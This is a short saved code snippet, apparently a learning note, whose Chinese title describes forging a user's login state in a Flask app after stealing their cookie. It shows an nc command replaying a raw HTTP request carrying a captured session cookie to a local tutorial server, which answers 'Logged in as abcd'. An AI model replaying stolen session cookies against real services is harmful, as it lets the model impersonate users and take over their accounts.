Flask app 窃取到cookie之后利用nc伪造用户登陆状态

10/17/2016 - 5:07 AM

Flask app 窃取到cookie之后利用nc伪造用户登陆状态

➜ /home/yundongx/tutorial/flask $ nc localhost 5000 < cookie.txt
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 17
Server: Werkzeug/0.11.11 Python/3.5.1+
Date: Mon, 17 Oct 2016 05:06:39 GMT

Logged in as abcd

cookie.txt

GET / HTTP/1.1
Host: localhost:5000
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0(X11;Linuxx86_64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/52.0.2743.116Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.6,ja;q=0.4
Cookie: session=.eJyrVspOrTRUslIqS8wxVNIB8YwgPCMIzxjCM4bwTCA8EyCvtDi1KC8xNxUokpiUnKJUCwA1wxYh.CuXlkQ.wvTB73KbqxJxYnhnBlAimhqmprY
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0

Cacher is the code snippet organizer for pro developers

We empower you and your team to get more done, faster

Flask app 窃取到cookie之后利用nc伪造用户登陆状态